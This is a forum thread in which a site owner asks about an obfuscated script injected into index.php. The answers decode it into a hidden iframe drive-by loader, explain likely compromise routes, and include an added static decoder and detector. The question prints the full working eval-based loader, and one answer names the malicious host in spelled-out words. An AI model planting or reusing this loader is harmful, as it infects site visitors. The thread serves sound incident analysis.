
I have a site. My site was having difficulties yesterday: when I opened it with Google Chrome, instead of my site this page was shown:

Warning: Visiting this site may harm your computer!
The website at http:... appears to host malware - Software that can hurt your 
computer or otherwise operate without your consent.
....

I viewed my page source in Chrome and I saw this script at the end of my code (after ):

 echo ""; echo "<script>try{if(window.document)window[\"document\"][\"body\"]=\"123\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}
n=[\"9\",\"9\",\"45\",\"42\",\"17\",\"1f\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1g\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"17\",\"41\",\"48\",\"4f\",\"41\",\"17\",\"4n\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"19\",\"2a\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"17\",\"4f\",\"4e\",\"3o\",\"2b\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"17\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"2b\",\"1e\",\"1o\",\"1n\",\"1e\",\"17\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"2b\",\"1e\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"28\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"29\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"28\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"29\",\"48\",\"41\",\"42\",\"4g\",\"28\",\"1n\",\"29\",\"4g\",\"4b\",\"4c\",\"28\",\"1n\",\"29\",\"1e\",\"2c\",\"2a\",\"1m\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"2c\",\"19\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\",\"d\",\"9\",\"9\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"4e\",\"1f\",\"1g\",\"4n\",
\"d\",\"9\",\"9\",\"9\",\"4i\",\"3m\",\"4e\",\"17\",\"42\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4f\",\"4e\",\"3o\",\"1e\",\"1j\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4e\",\"3m\",\"43\",\"4b\",\"4b\",\"4f\",\"41\",\"1l\",\"45\",\"4c\",\"4d\",\"1l\",\"3o\",\"4b\",\"1m\",\"3o\",\"4b\",\"4e\",\"4e\",\"41\",\"3o\",\"4g\",\"45\",\"4a\",\"43\",\"1m\",\"45\",\"49\",\"3m\",\"43\",\"45\",\"4a\",\"41\",\"1k\",\"4e\",\"41\",\"3m\",\"40\",\"4l\",\"3k\",\"41\",\"4a\",\"4g\",\"41\",\"4e\",\"3k\",\"47\",\"41\",\"41\",\"4a\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4i\",\"45\",\"4f\",\"45\",\"3n\",\"45\",\"48\",\"45\",\"4g\",\"4l\",\"2b\",\"1e\",\"44\",\"45\",\"40\",\"40\",\"41\",\"4a\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"2b\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"2b\",\"1e\",\"1n\",\"1e\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"42\",\"1l\",\"4f\",\"41\",\"4g\",\"2f\",\"4g\",\"4g\",\"4e\",\"45\",\"3n\",\"4h\",\"4g\",\"41\",\"1f\",\"1e\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"1e\",\"1j\",\"1e\",\"1o\",\"1n\",\"1e\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"9\",\"40\",\"4b\",\"3o\",\"4h\"
,\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"4f\",\"2g\",\"4l\",\"39\",\"3m\",\"43\",\"33\",\"3m\",\"49\",\"41\",\"1f\",\"1e\",\"3n\",\"4b\",\"40\",\"4l\",\"1e\",\"1g\",\"3g\",\"1n\",\"3i\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"42\",\"1g\",\"29\",\"d\",\"9\",\"9\",\"50\"];h=2;s=\"\";if(m)for(i=0;i-631!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";

NOTE: This script wasn't in my code before!! What is this?! How was it written into my index.php file?!


3 Answers


Your site has been compromised. It usually happens in one of the following scenarios:

1) You granted access to the document root via FTP to somebody using Windows, and his/her computer was infected with a virus that recovered the FTP password from the FTP client configuration (the "remember password" feature)

2) Somebody guessed the FTP password

3) The whole system may be compromised

4) Some script/application is vulnerable (as @Konerak mentioned)

To find out whether it is 1), 2) or the third reason, look at the FTP server logs - for proftpd that is /var/log/proftpd/xferlog on my Debian system

If it is one of the FTP issues, change the FTP passwords immediately, run antivirus on all clients and distribute the new passwords. To clean the site it is usually enough to search for the offending string and remove it from all files in the document root. It is usually the same string in all infected files. Also watch out for infected javascript files (*.js)

If there is a vulnerable script on the site, it can be identified by looking at the modification time of index.php and finding the corresponding hit in the access log. They usually use the POST method or tricky GET parameters (visible in the log)

answered 2012-11-17T09:13:17.547

Yes, of course:

If your page is modified without your knowledge and consent, your site definitely has a vulnerability

As for the HOW, here is a little attempt to find out the WHAT

To be sure, and to learn more about this encoded virus, we can run php from the command line

1. Copy the bad code into a script, enclosing it between php tags:

cat << eof > badscript
<?php
echo ""; echo "<script>try{if(window.doc....
n=[\"9\",\"9\",\"45\",\"42\",\"1
?>
eof

2. Do a first translation with php using the following command:

php <badscript >badscript2

Now badscript2 contains a javascript-encoded virus:

<script>try{if(window.document)window["document"]["body"]="1...
n=["9","9","45","42","17"...;if(v)ev(z)}}}</script>

After a little read of this script (the html tags are taken out):

sed < badscript2 -e 's/<\/\?script>//g' >badscript3

3. Read the javascript code a little (I am using emacs)

rename s/$/.js/ badscript3 
emacs badscript3.js

...some formatting operations... save...

sed <badscript3.js -e 's/\t/        /g;s/^/    /;s/^\(.\{76\}\).*$/\1.../' 
try{
    if (window.document) window["document"]["body"]="123"}
catch (bawetawe) { 
    if(window.document){
        v=window;
        try{fawbe--}catch(afnwenew){
            try{(v+v)()}catch(gngrthn){
                try{
                    if(020===0x10) v["document"]["bo"+"dy"]="123"
                }catch(gfdnfdgber){
                    m=123;
                    if((alert+"").indexOf("n"+"a"+"ti"+"ve")!==-1) 
                        ev=window["eval"];
                }
            }
            n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41"...
            h=2;
            s="";
            if(m)for(i=0;i-631!=0;i++){
                k=i;
                if(window["document"])
                    s+=String.fromCharCode(parseInt(n[i],25));
            }
            z=s;
            if(v)ev(z)
        }
    }
}

So you can see that the interesting part comes from n=[ ... ev(z). For this I use Mozilla's SpiderMonkey binary tool smjs

After setting aside the first (readable) part and some tests that don't work under command-line smjs, like window or document, and changing the last operation ev (defined in the first part as ev=window.eval) to a function more suitable for smjs (I chose: print() ;-), here is what is sent to smjs:

n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","...
h=2;
s="";
for(i=0;i-631!=0;i++){
    k=i;
    s+=String.fromCharCode(parseInt(n[i],25));
}
z=s;
print(z);

4. Finally, this shows me:

smjs < badscript3.js >badscript4.js
emacs badscript4.js

That is:

if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe
      src='http:  --  censored virus link -- .php' width='10' height='10'
      style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http: --  censored virus link -- keen.php');
f.style.visibility='hidden';f.style.position='absolute';
f.style.left='0';f.style.top='0';
f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

Note: to minimise the cut'n'paste risk I have censored the links; they originally pointed to the virus at http: slash slash ragoose.ipq.co slash correcting slash imagine-ready_enter_keen.php

Be careful, but have fun!

answered 2012-11-17T10:39:09.287
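The decoding this answer does with smjs, redone as a static decoder that never evaluates the attacker's JavaScript, as an added example that is not part of the original answers; it also checks for the loader string that the first answer suggests searching the document root for. The sample strings, the placeholder.invalid host and the function names are constructed for illustration and do not come from the page.

```python
"""Static decoder for the base-25 obfuscated injection quoted in the question.
Added example, not code from the original post: the payload is recovered with
string operations only, so the attacker's JavaScript is never executed (the
smjs/eval route in the answer does run it). Sample inputs are constructed."""
import re

# Constructed sample: a PHP echo line shaped like the injected one, carrying the
# first 48 tokens of the array quoted in the question, PHP-escaped (\") as in
# the infected index.php.
SAMPLE_PHP = (
    'echo "<script>try{fawbe--}catch(e){m=123;ev=window[\\"eval\\"];'
    'n=[\\"9\\",\\"9\\",\\"45\\",\\"42\\",\\"17\\",\\"1f\\",\\"40\\",\\"4b\\",\\"3o\\",'
    '\\"4h\\",\\"49\\",\\"41\\",\\"4a\\",\\"4g\\",\\"1l\\",\\"43\\",\\"41\\",\\"4g\\",'
    '\\"2j\\",\\"48\\",\\"41\\",\\"49\\",\\"41\\",\\"4a\\",\\"4g\\",\\"4f\\",\\"2g\\",'
    '\\"4l\\",\\"39\\",\\"3m\\",\\"43\\",\\"33\\",\\"3m\\",\\"49\\",\\"41\\",\\"1f\\",'
    '\\"1e\\",\\"3n\\",\\"4b\\",\\"40\\",\\"4l\\",\\"1e\\",\\"1g\\",\\"3g\\",\\"1n\\",'
    '\\"3i\\",\\"1g\\",\\"4n\\"];'
    'h=2;s=\\"\\";if(m)for(i=0;i-631!=0;i++){s+=String.fromCharCode(parseInt(n[i],25));}'
    'z=s;if(v)ev(z)}</script>";'
)

# Constructed decoded second stage in the shape shown above; placeholder host.
SAMPLE_DECODED = (
    "document.write(\"<iframe src='http://placeholder.invalid/a.php' width='10'>\");"
    "f.setAttribute('src','http://placeholder.invalid/b.php');"
)

MARKER_RE = re.compile(r'parseInt\(n\[i\],\s*25\)')  # the loader's signature
ARRAY_RE = re.compile(r'n=\[(.*?)\]', re.S)
TOKEN_RE = re.compile(r'[0-9a-o]+')                 # the only legal base-25 digits
SRC_RE = re.compile(r"""(?:src=|setAttribute\(['"]src['"],\s*)['"]([^'"]+)['"]""")

def looks_infected(text):
    """True when file content carries the base-25 loader signature (the string
    to search for across the document root, *.js files included)."""
    return MARKER_RE.search(text) is not None

def decode_payload(text):
    """Recover the second stage exactly as s+=String.fromCharCode(parseInt(n[i],25))
    would, but without evaluating it."""
    m = ARRAY_RE.search(text)
    if m is None:
        raise ValueError("no n=[...] array found")
    return ''.join(chr(int(tok, 25)) for tok in TOKEN_RE.findall(m.group(1)))

def iframe_sources(js):
    """Pull the iframe src URLs out of the decoded stage: the indicators to block
    at the proxy and to search for in the other files of the site."""
    return SRC_RE.findall(js)
```

Run `looks_infected` over every file under the document root to find all copies of the injection, then `decode_payload` on one hit to see where the hidden iframe points.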

I have had this happen many times on shared hosting. Usually it is a vulnerable script belonging to you or to somebody else on your machine, which can then look for predictable file paths and append to the files.

/home/user1/public_html/index.php for example is very predictable.

So the vulnerability would allow somebody to run "ls /home/" and then look for ./public_html/index.php in each directory. Many times you can open those files even if you can't cd into the directory.

Another scenario is that your site, or one of your other domains, has a vulnerability that allows write access to any of your subdirectories (because the web server is usually owned by you).

answered 2012-11-17T09:23:06.273